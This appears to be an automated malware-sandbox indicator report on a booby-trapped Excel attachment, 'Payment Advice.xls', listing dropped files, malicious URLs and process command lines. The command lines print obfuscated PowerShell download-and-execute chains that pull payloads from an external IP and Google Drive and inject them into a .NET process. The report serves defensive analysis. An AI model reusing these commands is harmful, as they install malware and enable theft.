IOC Report
Payment Advice.xls

loading gif

Files

File Path
Type
Category
Malicious
Payment Advice.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 05:31:16 2024, Security: 1
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingsevermeetwithgreatthingstobegood[1].hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Temp\f2dj0ncr\f2dj0ncr.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\Payment Advice.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 18:46:48 2024, Security: 1
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\logisticthingswithgoodthingsgivenbest[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C3ABE4C.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33E4563A.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C39F1DD.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73203679.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89D7CF3.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D63E37B7.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\1gnxtwym.xfa.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\21rgtxet.q1w.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RES19C8.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 17:46:39 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RES6651.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 17:46:59 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\a1ss3ymk.rwo.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\al22exsj\CSC903F5E3F8DB7424CB84D15F933E11EB7.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\al22exsj\al22exsj.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (349)
dropped
C:\Users\user\AppData\Local\Temp\al22exsj\al22exsj.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\al22exsj\al22exsj.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\al22exsj\al22exsj.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\amvnjluh.4fk.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\cnbzxbrd.d10.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\f2dj0ncr\CSC6208178C473A4F0793DCFE56B934F534.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\f2dj0ncr\f2dj0ncr.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (349)
dropped
C:\Users\user\AppData\Local\Temp\f2dj0ncr\f2dj0ncr.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\f2dj0ncr\f2dj0ncr.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\fwlxjcj1.far.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\g5sxyqzp.igl.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\gbxy11cd.xku.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\hvufkav3.xwz.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\j342xw3p.lca.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\o101k1eb.rci.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ofnoeyj2.jb3.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ojtid1cu.x1o.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\roddab1g.w0x.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\uhqghqyp.nld.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\vnvjvi51.eel.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF01C0441D5BE0A5E1.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFBA09452E869949F1.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFE96D4E8D4C0FD3D9.TMP
data
dropped
C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
data
dropped
C:\Users\user\Desktop\DA430000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 18:46:48 2024, Security: 1
dropped
C:\Users\user\Desktop\DA430000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
There are 38 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SySTeM32\winDowspOWErShell\v1.0\PoweRShELl.EXe" "powErshell -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt ; IeX($(iex('[SystEM.TExt.EncoDING]'+[ChAr]0x3A+[char]58+'UTf8.gETSTrIng([SystEm.cOnVeRT]'+[CHar]0x3A+[ChaR]58+'FROMBasE64STRIng('+[cHar]0X22+'JFpibFZsdVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFckRlRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExIayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2FseXlhR21BWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpUkpqdVRGeUZsTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhZIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFPaGJRUSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRaYmxWbHVSdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xNDEvNDIvbG9naXN0aWN0aGluZ3N3aXRoZ29vZHRoaW5nc2dpdmVuYmVzdC50SUYiLCIkRU5WOkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIiwwLDApO3N0QVJ0LXNsZWVwKDMpO3N0QVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIg=='+[Char]0x22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2dj0ncr\f2dj0ncr.cmdline"
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdXaDdpbWFnZVVybCA9IHJmSWh0dHBzOi8vZHJpdmUuZ28nKydvZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9JysnMUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHJmSTtXaDd3ZWJDbGknKydlbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1doN2ltYScrJ2dlQnl0ZXMgPSBXaCcrJzcnKyd3ZWJDbGllbnQuRG93bmxvYWREYXRhKFdoN2ltYWdlVXJsKTtXaDdpbScrJ2FnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW4nKydjb2RpbmddOjpVVEY4LkdldFN0JysncmluZyhXaCcrJzdpbWFnZUJ5dGVzKTtXaDdzdGFyJysndEZsYWcgPSByZkk8PEJBU0U2NF9TVEFSVD4+cmZJO1doN2VuZEZsYWcgPSByZkk8PEJBU0U2NCcrJ19FTkQ+PnJmSTtXaDdzdGFydEluZGV4ID0gV2g3aW1hZ2VUZXh0LkluZGV4T2YoV2g3c3RhcnRGbGFnKTtXaDdlbmRJbicrJ2RleCA9IFdoN2ltYScrJ2dlVGV4dC5JbmRleE9mKFdoN2VuZEZsYScrJ2cpO1doN3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBXaDdlbmRJbmRleCAtZ3QgV2g3c3RhcnRJbmQnKydleDtXJysnaDdzdGFydEluZGV4ICs9IFdoN3N0YXJ0RmxhZy5MZW5ndGg7V2g3YmFzZTY0TGVuZ3RoID0gV2g3ZW5kSW5kZXggLSBXaDdzdGFydEluZGV4O1doN2Jhc2U2NENvbW1hbmQgPSBXaDdpbWFnZVRleHQuU3Vic3RyaW5nKFdoN3N0YXJ0SW5kZXgsIFdoN2Jhc2U2NExlbmd0aCknKyc7V2g3YmEnKydzZTY0UicrJ2V2ZXJzZWQgPSAtam9pbiAoV2g3YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJZOSBGb3JFYWNoLU9iamVjdCB7IFdoNycrJ18gfSlbLTEuLi0oV2g3YmFzZTY0Q29tbWFuZC5MZW5ndGgnKycpXTtXaDdjJysnb21tYW5kQnl0ZXMgPSBbU3lzdCcrJ2VtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFdoN2JhJysnc2U2NFJldmVyc2VkKTtXaDdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoV2g3Y29tbWFuJysnZEJ5dGVzJysnKTtXaDd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHJmSVZBSXJmSSk7JysnV2g3dmFpTWV0aG9kLkludm9rZShXaDdudWwnKydsLCBAKHJmSXR4dC5JS0xHT0wvMjQvMTQxLjY3MS4zLicrJzI5MS8vOnB0dGhyZkknKycsIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWFzcG5ldF9yZWdicm93c2Vyc3JmSSwgcmZJZGVzYXRpdmFkb3JmSSwgcmZJZGVzYXRpdmFkb3JmSSxyZklkJysnZXNhdGl2YWRvJysncmZJLHJmJysnSWRlc2F0aXZhJysnZG9yZkkscmZJZGVzYXRpdmFkb3JmSSxyZklkZXNhdGl2YWQnKydvcmZJLHJmSWRlc2F0aXZhZCcrJ29yZkkscmZJMXJmSSxyZklkZXNhdGl2YWRvcmZJKSk7JykuUkVQTEFjRSgoW0NIYXJdODcrW0NIYXJdMTA0K1tDSGFyXTU1KSwnJCcpLlJFUExBY0UoJ3JmSScsW3N0cmluR11bQ0hhcl0zOSkuUkVQTEFjRSgoW0NIYXJdODIrW0NIYXJdODkrW0NIYXJdNTcpLFtzdHJpbkddW0NIYXJdMTI0KSB8LiAoICRWRXJCb1NFUHJlZkVyZU5DZS5Ub3NUUmluZygpWzEsM10rJ1gnLWpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SySTeM32\winDowspOWErShell\v1.0\PoweRShELl.EXe" "powErshell -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt ; IeX($(iex('[SystEM.TExt.EncoDING]'+[ChAr]0x3A+[char]58+'UTf8.gETSTrIng([SystEm.cOnVeRT]'+[CHar]0x3A+[ChaR]58+'FROMBasE64STRIng('+[cHar]0X22+'JFpibFZsdVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFckRlRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExIayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2FseXlhR21BWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpUkpqdVRGeUZsTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhZIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFPaGJRUSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRaYmxWbHVSdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xNDEvNDIvbG9naXN0aWN0aGluZ3N3aXRoZ29vZHRoaW5nc2dpdmVuYmVzdC50SUYiLCIkRU5WOkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIiwwLDApO3N0QVJ0LXNsZWVwKDMpO3N0QVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIg=='+[Char]0x22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Wh7imageUrl = rfIhttps://drive.go'+'ogle.com/uc?export=download&id='+'1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur rfI;Wh7webCli'+'ent = New-Object System.Net.WebClient;Wh7ima'+'geBytes = Wh'+'7'+'webClient.DownloadData(Wh7imageUrl);Wh7im'+'ageText = [System.Tex'+'t.En'+'coding]::UTF8.GetSt'+'ring(Wh'+'7imageBytes);Wh7star'+'tFlag = rfI<<BASE64_START>>rfI;Wh7endFlag = rfI<<BASE64'+'_END>>rfI;Wh7startIndex = Wh7imageText.IndexOf(Wh7startFlag);Wh7endIn'+'dex = Wh7ima'+'geText.IndexOf(Wh7endFla'+'g);Wh7startIndex -ge 0 -and Wh7endIndex -gt Wh7startInd'+'ex;W'+'h7startIndex += Wh7startFlag.Length;Wh7base64Length = Wh7endIndex - Wh7startIndex;Wh7base64Command = Wh7imageText.Substring(Wh7startIndex, Wh7base64Length)'+';Wh7ba'+'se64R'+'eversed = -join (Wh7base64Command.ToCharArray() RY9 ForEach-Object { Wh7'+'_ })[-1..-(Wh7base64Command.Length'+')];Wh7c'+'ommandBytes = [Syst'+'em.Convert]::FromBase64String(Wh7ba'+'se64Reversed);Wh7loadedAssembly = [System.Reflection.Assembly]::Load(Wh7comman'+'dBytes'+');Wh7vaiMethod = [dnlib.IO.Home].GetMethod(rfIVAIrfI);'+'Wh7vaiMethod.Invoke(Wh7nul'+'l, @(rfItxt.IKLGOL/24/141.671.3.'+'291//:ptthrfI'+', rfIdesativadorfI, rfIdesativadorfI, rfIdesativadorfI, rfIaspnet_regbrowsersrfI, rfIdesativadorfI, rfIdesativadorfI,rfId'+'esativado'+'rfI,rf'+'Idesativa'+'dorfI,rfIdesativadorfI,rfIdesativad'+'orfI,rfIdesativad'+'orfI,rfI1rfI,rfIdesativadorfI));').REPLAcE(([CHar]87+[CHar]104+[CHar]55),'$').REPLAcE('rfI',[strinG][CHar]39).REPLAcE(([CHar]82+[CHar]89+[CHar]57),[strinG][CHar]124) |. ( $VErBoSEPrefEreNCe.TosTRing()[1,3]+'X'-joIn'')"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\al22exsj\al22exsj.cmdline"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdXaDdpbWFnZVVybCA9IHJmSWh0dHBzOi8vZHJpdmUuZ28nKydvZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9JysnMUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHJmSTtXaDd3ZWJDbGknKydlbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1doN2ltYScrJ2dlQnl0ZXMgPSBXaCcrJzcnKyd3ZWJDbGllbnQuRG93bmxvYWREYXRhKFdoN2ltYWdlVXJsKTtXaDdpbScrJ2FnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW4nKydjb2RpbmddOjpVVEY4LkdldFN0JysncmluZyhXaCcrJzdpbWFnZUJ5dGVzKTtXaDdzdGFyJysndEZsYWcgPSByZkk8PEJBU0U2NF9TVEFSVD4+cmZJO1doN2VuZEZsYWcgPSByZkk8PEJBU0U2NCcrJ19FTkQ+PnJmSTtXaDdzdGFydEluZGV4ID0gV2g3aW1hZ2VUZXh0LkluZGV4T2YoV2g3c3RhcnRGbGFnKTtXaDdlbmRJbicrJ2RleCA9IFdoN2ltYScrJ2dlVGV4dC5JbmRleE9mKFdoN2VuZEZsYScrJ2cpO1doN3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBXaDdlbmRJbmRleCAtZ3QgV2g3c3RhcnRJbmQnKydleDtXJysnaDdzdGFydEluZGV4ICs9IFdoN3N0YXJ0RmxhZy5MZW5ndGg7V2g3YmFzZTY0TGVuZ3RoID0gV2g3ZW5kSW5kZXggLSBXaDdzdGFydEluZGV4O1doN2Jhc2U2NENvbW1hbmQgPSBXaDdpbWFnZVRleHQuU3Vic3RyaW5nKFdoN3N0YXJ0SW5kZXgsIFdoN2Jhc2U2NExlbmd0aCknKyc7V2g3YmEnKydzZTY0UicrJ2V2ZXJzZWQgPSAtam9pbiAoV2g3YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJZOSBGb3JFYWNoLU9iamVjdCB7IFdoNycrJ18gfSlbLTEuLi0oV2g3YmFzZTY0Q29tbWFuZC5MZW5ndGgnKycpXTtXaDdjJysnb21tYW5kQnl0ZXMgPSBbU3lzdCcrJ2VtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFdoN2JhJysnc2U2NFJldmVyc2VkKTtXaDdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoV2g3Y29tbWFuJysnZEJ5dGVzJysnKTtXaDd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHJmSVZBSXJmSSk7JysnV2g3dmFpTWV0aG9kLkludm9rZShXaDdudWwnKydsLCBAKHJmSXR4dC5JS0xHT0wvMjQvMTQxLjY3MS4zLicrJzI5MS8vOnB0dGhyZkknKycsIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWFzcG5ldF9yZWdicm93c2Vyc3JmSSwgcmZJZGVzYXRpdmFkb3JmSSwgcmZJZGVzYXRpdmFkb3JmSSxyZklkJysnZXNhdGl2YWRvJysncmZJLHJmJysnSWRlc2F0aXZhJysnZG9yZkkscmZJZGVzYXRpdmFkb3JmSSxyZklkZXNhdGl2YWQnKydvcmZJLHJmSWRlc2F0aXZhZCcrJ29yZkkscmZJMXJmSSxyZklkZXNhdGl2YWRvcmZJKSk7JykuUkVQTEFjRSgoW0NIYXJdODcrW0NIYXJdMTA0K1tDSGFyXTU1KSwnJCcpLlJFUExBY0UoJ3JmSScsW3N0cmluR11bQ0hhcl0zOSkuUkVQTEFjRSgoW0NIYXJdODIrW0NIYXJdODkrW0NIYXJdNTcpLFtzdHJpbkddW0NIYXJdMTI0KSB8LiAoICRWRXJCb1NFUHJlZkVyZU5DZS5Ub3NUUmluZygpWzEsM10rJ1gnLWpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Wh7imageUrl = rfIhttps://drive.go'+'ogle.com/uc?export=download&id='+'1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur rfI;Wh7webCli'+'ent = New-Object System.Net.WebClient;Wh7ima'+'geBytes = Wh'+'7'+'webClient.DownloadData(Wh7imageUrl);Wh7im'+'ageText = [System.Tex'+'t.En'+'coding]::UTF8.GetSt'+'ring(Wh'+'7imageBytes);Wh7star'+'tFlag = rfI<<BASE64_START>>rfI;Wh7endFlag = rfI<<BASE64'+'_END>>rfI;Wh7startIndex = Wh7imageText.IndexOf(Wh7startFlag);Wh7endIn'+'dex = Wh7ima'+'geText.IndexOf(Wh7endFla'+'g);Wh7startIndex -ge 0 -and Wh7endIndex -gt Wh7startInd'+'ex;W'+'h7startIndex += Wh7startFlag.Length;Wh7base64Length = Wh7endIndex - Wh7startIndex;Wh7base64Command = Wh7imageText.Substring(Wh7startIndex, Wh7base64Length)'+';Wh7ba'+'se64R'+'eversed = -join (Wh7base64Command.ToCharArray() RY9 ForEach-Object { Wh7'+'_ })[-1..-(Wh7base64Command.Length'+')];Wh7c'+'ommandBytes = [Syst'+'em.Convert]::FromBase64String(Wh7ba'+'se64Reversed);Wh7loadedAssembly = [System.Reflection.Assembly]::Load(Wh7comman'+'dBytes'+');Wh7vaiMethod = [dnlib.IO.Home].GetMethod(rfIVAIrfI);'+'Wh7vaiMethod.Invoke(Wh7nul'+'l, @(rfItxt.IKLGOL/24/141.671.3.'+'291//:ptthrfI'+', rfIdesativadorfI, rfIdesativadorfI, rfIdesativadorfI, rfIaspnet_regbrowsersrfI, rfIdesativadorfI, rfIdesativadorfI,rfId'+'esativado'+'rfI,rf'+'Idesativa'+'dorfI,rfIdesativadorfI,rfIdesativad'+'orfI,rfIdesativad'+'orfI,rfI1rfI,rfIdesativadorfI));').REPLAcE(([CHar]87+[CHar]104+[CHar]55),'$').REPLAcE('rfI',[strinG][CHar]39).REPLAcE(([CHar]82+[CHar]89+[CHar]57),[strinG][CHar]124) |. ( $VErBoSEPrefEreNCe.TosTRing()[1,3]+'X'-joIn'')"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES19C8.tmp" "c:\Users\user\AppData\Local\Temp\f2dj0ncr\CSC6208178C473A4F0793DCFE56B934F534.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6651.tmp" "c:\Users\user\AppData\Local\Temp\al22exsj\CSC903F5E3F8DB7424CB84D15F933E11EB7.TMP"
There are 8 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://drive.go
unknown
malicious
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.hta
192.3.176.141
malicious
http://94.156.177.220/logs/five/fre.php
94.156.177.220
malicious
http://192.3.176.141/42/logisticthingswithgoodthingsgivenbest.tIF
192.3.176.141
malicious
http://192.3.176.141/42/LOGLKI.txt
192.3.176.141
malicious
https://qrisni.me/
unknown
http://nuget.org/NuGet.exe
unknown
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.htat=nebulous&
unknown
https://qrisni.me/F
unknown
http://crl.entrust.net/server1.crl0
unknown
http://192.3.176.141/
unknown
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.htaC:
unknown
http://ocsp.entrust.net03
unknown
https://qrisni.me/E
unknown
https://contoso.com/License
unknown
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.htacC:
unknown
https://contoso.com/Icon
unknown
http://192.3.176.141/42/logistic
unknown
http://192.3.176.141/42/logisticthingswithgoodthingsgivenbest.tIFp
unknown
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.hta...
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://go.micros
unknown
https://qrisni.me/O
unknown
http://192.3.176.141/viderC
unknown
https://drive.gop
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
